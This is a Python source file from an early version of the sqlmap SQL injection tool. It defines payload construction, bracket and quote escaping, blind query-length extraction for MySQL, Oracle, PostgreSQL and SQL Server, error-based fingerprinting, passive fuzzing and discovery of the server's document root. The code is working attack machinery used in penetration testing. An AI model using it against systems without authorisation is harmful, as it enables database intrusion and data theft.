#!/usr/bin/env python


import logging
import re
import sys
import time

from sqlmap.blind import Blind
from sqlmap.parser import htmlParser
from sqlmap.settings import ERRORS_XML
from sqlmap.settings import FUZZ_VECTORS


class Common(Blind):
    """
    This class defines common methods used in many other parts
    of sqlmap

    @author: Bernardo Damele and Daniele Bellucci
    """

    def injectionQuery(self, string, singleString=False, doubleString=False):
        """
        This method defines how the input string has to be escaped
        to perform the injection depending on the injection method
        identified as valid
        """

        if self.args.injectionMethod == "numeric":
            query = "%s" % string
        elif self.args.injectionMethod == "stringsingle":
            if singleString:
                query = "'%s" % singleString
            else:
                query = "'%s" % string
        elif self.args.injectionMethod == "stringdouble":
            if doubleString:
                query = "\"%s" % doubleString
            else:
                query = "\"%s" % string

        return query


    def forgeHeaders(self, cookie, ua):
        headers = []

        for header, value in self.args.httpHeaders:
            if cookie and header == "Cookie":
                headers.append((header, cookie))
            elif ua and header == "User-Agent":
                headers.append((header, ua))
            else:
                headers.append((header, value))

        return headers


    def forgeTestParameters(self):
        if self.args.testParameter:
            self.args.testParameter = self.args.testParameter.replace(", ", ",")
            self.args.testParameter = self.args.testParameter.split(",")
        else:
            self.args.testParameter = []


    def payload(self, place=None, parameter=None, value=None, newValue=None):
        """
        This method replaces the affected parameter with the SQL
        injection statement to request
        """

        retValue = ""

        if self.args.injPlace == "User-Agent":
            retValue = self.args.injParameter.replace(self.args.injParameter,
                                                      self.args.injParameter + newValue)
        elif self.args.injParameter:
            paramString = self.args.parameters[self.args.injPlace]
            paramDict = self.args.paramDict[self.args.injPlace]
            value = paramDict[self.args.injParameter]
            retValue = paramString.replace("%s=%s" % (self.args.injParameter, value),
                                           "%s=%s" % (self.args.injParameter, value + newValue))
        # For injection on User-Agent header
        elif not parameter:
            retValue = value.replace(value, newValue)
        else:
            paramString = self.args.parameters[place]
            retValue = paramString.replace("%s=%s" % (parameter, value),
                                           "%s=%s" % (parameter, newValue))

        return retValue


    def splitUrlParams(self):
        """
        This method checks if the target has parameters then split the
        url from its parameters
        """

        if "?" in self.args.url:
            url, parameters = self.args.url.split("?")
        elif self.args.googleDork:
            warnMsg  = "the target url has not parameters "
            warnMsg += "so it is not possible to test SQL "
            warnMsg += "injection on it, skipping to next url"
            self.logger.warn(warnMsg)

            return None

        return url, parameters


    def paramDict(self, place, parameters=None):
        """
        This method split the parameter names from their value and save
        the data into a dictionary
        """

        if self.args.parameters.has_key(place) and not parameters:
            parameters = self.args.parameters[place]

        parameters = parameters.replace(", ", ",")
        testableParams = {}

        if place == "Cookie":
            splitParams = parameters.split(";")
        else:
            splitParams = parameters.split("&")

        for element in splitParams:
            elem = element.split("=")

            if len(elem) == 2:
                parameter = elem[0]

                condition  = not self.args.testParameter
                condition |= parameter in self.args.testParameter

                if condition:
                    value = elem[1]
                    if value:
                        testableParams[parameter] = value

        if self.args.testParameter and not testableParams:
            paramStr = ", ".join(test for test in self.args.testParameter)

            if len(self.args.testParameter) > 1:
                warnMsg  = "the testable parameters '%s' " % paramStr
                warnMsg += "you provided are not into the %s" % place
            else:
                parameter = self.args.testParameter[0]

                warnMsg  = "the testable parameter '%s' " % paramStr
                warnMsg += "you provided is not into the %s" % place

            if self.args.googleDork:
                warnMsg += ", skipping to next url"

            self.logger.warn(warnMsg)
        elif len(self.args.testParameter) != len(testableParams.keys()):
            for parameter in self.args.testParameter:
                if parameter not in testableParams.keys():
                    warnMsg =  "the testable parameter '%s' " % parameter
                    warnMsg += "you provided is not into the %s" % place
                    self.logger.warn(warnMsg)

        return testableParams


    def parseFp(self, dbms, fingerprint):
        """
        This method format the remote DBMS fingerprint output
        """

        fp = dbms

        if len(fingerprint) == 0:
            return "%s" % fp
        elif len(fingerprint) == 1:
            return "%s %s" % (fp, fingerprint[0])
        else:
            for value in fingerprint:
                fp += " %s and" % value

            return fp[:-4]


    def queryVars(self, expression):
        expressionUnescaped = self.unescape(expression)

        if re.search("\ASELECT ", expression, re.I):
            method = "SELECT"
        else:
            method = None

        if not self.args.fingerprint:
            return expressionUnescaped, None, None, method

        if self.args.fingerprint == "MySQL":
            firstDbStr = "LENGTH(%s)"
            secondDbStr = "MID((%s), %d, %d)"
        elif self.args.fingerprint == "Oracle":
            firstDbStr = "LENGTH(%s)"
            secondDbStr = "SUBSTR((%s), %d, %d)"
        elif self.args.fingerprint == "PostgreSQL":
            firstDbStr = "LENGTH(%s)"
            secondDbStr = "SUBSTR((%s), %d, %d)"
        elif self.args.fingerprint == "Microsoft SQL Server":
            firstDbStr = "LTRIM(STR(LEN(%s)))"
            secondDbStr = "SUBSTRING((%s), %d, %d)"
        else:
            errMsg  = "unable to retrieve the length "
            errMsg += "of query output for this DBMS"
            raise Exception, errMsg

        return expressionUnescaped, firstDbStr, secondDbStr, method


    def queryLength(self, expression, payload):
        """
        This method calculates and returns a query output length
        """

        expressionUnescaped, firstDbStr, secondDbStr, method = self.queryVars(expression)

        selectTopExpr = re.search("\ASELECT TOP\s+[\d]+\s+(.*?) FROM", expression, re.I)
        selectExpr = re.search("\ASELECT (.*?) FROM", expression, re.I)
        miscExpr = re.search("\A(.+)", expression, re.I)

        if selectTopExpr or selectExpr:
            if selectTopExpr:
                regExpr = selectTopExpr.groups()[0]
            elif selectExpr:
                regExpr = selectExpr.groups()[0]
        elif miscExpr:
            regExpr = miscExpr.groups()[0]

        if not self.args.fingerprint:
            return None, None, None

        if ( method == "SELECT" and re.search("\A(COUNT|LTRIM)\(", regExpr, re.I) ) or ( len(regExpr) <= 1 ):
            return None, None, None

        if method == "SELECT":
            newExpr = expressionUnescaped.replace(regExpr, firstDbStr % regExpr, 1)
        else:
            newExpr = firstDbStr % expressionUnescaped

        if self.args.verbose == 1:
            sys.stdout.write("[%s] [INFO] retrieved the length of query output: " % time.strftime("%X"))
            sys.stdout.flush()

        count, length = self.bisectionAlgorithm(payload, newExpr, log=False)

        return count, length, regExpr


    def appendComment(self, string, comment):
        """
        This method appends the DBMS comment to the
        SQL injection request
        """

        string += "%s" % comment

        if self.args.injectionMethod == "numeric":
            if self.args.brackets:
                string += " %s1=1" % ("(" * self.args.brackets)
        elif self.args.injectionMethod == "stringsingle":
            if self.args.brackets:
                string += " %s'1'='1" % ("(" * self.args.brackets)
            else:
                string += " '"
        elif self.args.injectionMethod == "stringdouble":
            if self.args.brackets:
                string += " %s\"1\"=\"1" % ("(" * self.args.brackets)
            else:
                string += " \""

        return string


    def checkForBrackets(self):
        """
        This method checks if the SQL injection affected parameter
        is within the brackets
        """

        num = []

        for x in range(1, 4):
            query = self.injectionQuery("%s " % (")" * x))

            if self.args.injectionMethod == "numeric":
                query += "AND %s1=1" % ("(" * x)
            elif self.args.injectionMethod == "stringsingle":
                query += "AND %s'1'='1" % ("(" * x)
            elif self.args.injectionMethod == "stringdouble":
                query += "AND %s\"1\"=\"1" % ("(" * x)

            payload = self.payload(newValue=query)
            result = self.queryPage(payload)

            if result == self.args.defaultResult:
                num.append(x)

        return len(num)


    def getHtmlErrorFp(self):
        htmlParsed = ""

        if not self.args.htmlFp:
            return None

        if len(self.args.htmlFp) == 1:
            htmlVer = self.args.htmlFp[0]
            htmlParsed = htmlVer
        elif len(self.args.htmlFp) > 1:
            htmlParsed = "or ".join([htmlFp for htmlFp in self.args.htmlFp])

        return htmlParsed


    def passiveFuzzing(self):
        logMsg = "executing passive fuzzing to retrieve DBMS error messages"
        self.logger.info(logMsg)

        fuzzVectors = open(FUZZ_VECTORS, "r")

        for fuzzVector in fuzzVectors:
            fuzzVector = fuzzVector.replace("\r", "").replace("\n", "")

            payload = self.payload(newValue=fuzzVector)
            self.queryPage(payload)


    def parsePage(self, page):
        if not page:
            return

        htmlParsed = htmlParser(page, ERRORS_XML)

        if htmlParsed and htmlParsed not in self.args.htmlFp:
            self.args.htmlFp.append(htmlParsed)

        # Detect injectable page absolute system path
        # TODO: this regular expression works if the remote web
        # application is written in PHP. Parse the page content through an
        # XML file like for DBMS error messages (ERRORS_XML), see above
        absFilePaths = re.findall(" in <b>(.*?)</b> on line", page, re.I)

        for absFilePath in absFilePaths:
            if absFilePath not in self.args.absFilePaths:
                self.args.absFilePaths.add(absFilePath)

    def getDocRoot(self):
        """
        This method returns document root and injectable file absolute
        system path

        @todo: replace it with a site crawling functionality
        """

        docRoot = None

        if self.args.absFilePaths:
            logMsg  = "retrieved the possible injectable "
            logMsg += "file absolute system paths: "
            logMsg += "'%s'" % ", ".join(path for path in self.args.absFilePaths)
            self.logger.info(logMsg)
        else:
            warnMsg  = "unable to retrieve the injectable file "
            warnMsg += "absolute system path"
            self.logger.warn(warnMsg)

        for absFilePath in self.args.absFilePaths:
            if self.args.pageUrl in absFilePath:
                index = absFilePath.index(self.args.pageUrl)
                docRoot = absFilePath[:index]
                break

        if docRoot:
            logMsg  = "retrieved the remote web server "
            logMsg += "document root: '%s'" % docRoot
            self.logger.info(logMsg)
        else:
            warnMsg  = "unable to retrieve the remote web server "
            warnMsg += "document root"
            self.logger.warn(warnMsg)

        return docRoot


    def getDirectories(self):
        """
        This method calls a function that returns document root and
        injectable file absolute system path

        @todo: replace it with a site crawling functionality
        """

        directories = set()

        self.args.docRoot = self.getDocRoot()

        if self.args.docRoot:
            directories.add(self.args.docRoot)

        pagePath = re.search('^/(.*)/', self.args.pageUrl)

        if self.args.docRoot and pagePath:
            pagePath = pagePath.groups()[0]

            directories.add("%s/%s" % (self.args.docRoot, pagePath))

        return directories


    def setDbms(self, dbms):
        condition = (
                      self.args.writeFile and self.args.resumedQueries and
                      self.args.url in self.args.resumedQueries.keys() and
                      "DBMS" not in self.args.resumedQueries[self.args.url].keys()
                    )

        if condition:
            self.args.writeFile.write("[%s][%s][%s][DBMS][%s]\n" % (self.args.url, self.args.injPlace, self.args.parameters[self.args.injPlace], dbms))
            self.args.writeFile.flush()

        self.args.fingerprint = dbms

